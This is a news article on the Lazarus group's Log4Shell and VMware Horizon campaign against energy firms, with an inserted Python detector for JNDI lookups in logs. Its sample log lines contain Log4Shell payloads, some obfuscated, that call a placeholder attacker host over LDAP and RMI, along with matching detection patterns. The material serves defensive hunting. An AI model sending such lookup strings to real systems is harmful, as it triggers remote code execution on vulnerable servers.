Lazarus hackers are using Log4j to hack US energy companies


Energy providers from around the world, including the United States, Canada, and Japan, have reportedly been targeted by state-sponsored North Korean hacker group Lazarus, also known as APT38.

According to Cisco's Talos Intelligence group, the campaign intends to infiltrate organizations around the world in the interests of establishing long-term access and subsequently exfiltrating data of interest to the nation-state.

Although the precise targets have remained unnamed, the attacks once again show the threat that North Korea and Lazarus can pose via destabilization efforts.

How did the attack work?

According to Talos, this campaign involved the exploitation of vulnerabilities in the VMware Horizon virtual desktop product to gain an initial foothold in targeted organizations.

After gaining successful entry into the targeted enterprise networks, the group then deployed custom malware implants including the HTML bots VSingle and YamaBot.

In addition to these known malware families, Talos researchers also reported discovering a previously unknown malware implant called "MagicRAT."

Initial entry into the organizations was reportedly made using Log4Shell (CVE-2021-44228), a zero-day vulnerability in Log4j, a popular Java logging framework, which allows arbitrary code execution.
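Because Log4Shell fires when a vulnerable Log4j instance logs attacker-controlled text containing a JNDI lookup, the most common first line of defence is to hunt for that lookup string in web, proxy and application logs. The following is an added detection example, not code from the article or from Talos; the log lines are constructed for illustration and the attacker hostnames and paths in them are placeholders. It also unwraps the simple nested-lookup wrappers (`${lower:...}`, `${upper:...}`, `${::-...}`) that are widely documented as ways the string gets hidden, so that the indicator still matches after normalization.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access log lines (not taken from the article or from any real incident).
SAMPLE_LOGS = [
    '10.0.0.5 - - [09/Sep/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [09/Sep/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [09/Sep/2022:10:02:11 +0000] "GET /login?user=${${lower:j}ndi:rmi://attacker.example/x} '
    'HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.3 - - [09/Sep/2022:10:03:00 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "kube-probe/1.24"',
]

# JNDI protocols that Log4Shell payloads are known to use to reach an attacker-controlled server.
SUSPICIOUS_PROTOCOLS = ("ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nis", "nds")

# Inner lookups that resolve to a literal: ${lower:x}, ${upper:x} and the default-value form ${::-x}.
INNER_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}|\$\{::-([^}$]*)\}", re.IGNORECASE)

# The actual indicator once wrappers are removed: ${jndi:<protocol>:
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(line: str) -> str:
    """Collapse ${lower:x}, ${upper:x} and ${::-x} to their literal x.

    Repeats until the text stops changing, so nested wrappers are unwrapped
    one layer at a time.
    """
    prev = None
    while prev != line:
        prev = line
        line = INNER_LOOKUP.sub(lambda m: m.group(1) or m.group(2) or "", line)
    return line


def scan_line(line: str) -> Optional[Dict]:
    """Return a finding dict if the line carries a JNDI lookup, else None."""
    normalized = normalize(line)
    match = JNDI_PATTERN.search(normalized)
    if not match:
        return None
    protocol = match.group(1).lower()
    return {
        "protocol": protocol,
        "known_protocol": protocol in SUSPICIOUS_PROTOCOLS,
        # True when the indicator only appeared after unwrapping nested lookups.
        "obfuscated": normalized != line,
        "raw": line,
    }


def scan_logs(lines: List[str]) -> List[Dict]:
    """Run scan_line over every line and keep only the hits."""
    return [hit for hit in (scan_line(line) for line in lines) if hit]


if __name__ == "__main__":
    for finding in scan_logs(SAMPLE_LOGS):
        flag = "obfuscated" if finding["obfuscated"] else "plain"
        print(f"[{flag}] jndi:{finding['protocol']} in: {finding['raw']}")
```

This is indicator-based hunting, so it catches the common forms but not every encoding; it complements, rather than replaces, patching Log4j (2.17.1 or later for the 2.x line) and blocking outbound LDAP/RMI from application servers, which stops the remote class load even when the lookup is triggered.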

Cybersecurity company Tenable has previously dubbed Log4Shell "the single biggest, most critical vulnerability ever".

This wouldn't be the first time North Korea has been implicated in attacks on foreign powers; security researchers at Kaspersky Lab have linked North Korea to the WannaCry ransomware attack, which disabled 300,000 computers in 150 countries and caused the UK's NHS unprecedented issues.

Since it was founded in 2010, the Lazarus group has certainly been keeping busy if nothing else. Lately, it's been turning its attention towards the world of blockchains and DeFi.

Lazarus was linked to the $615 million attack on the Ronin sidechain, which powers the popular blockchain-integrated game Axie Infinity, in what is known as one of the largest DeFi hacks to date.


Will McCurdy has been writing about technology for over five years. He has a wide range of specialities including cybersecurity, fintech, cryptocurrencies, blockchain, cloud computing, payments, artificial intelligence, retail technology, and venture capital investment. He has previously written for AltFi, FStech, Retail Systems, and National Technology News and is an experienced podcast and webinar host, as well as an avid long-form feature writer.
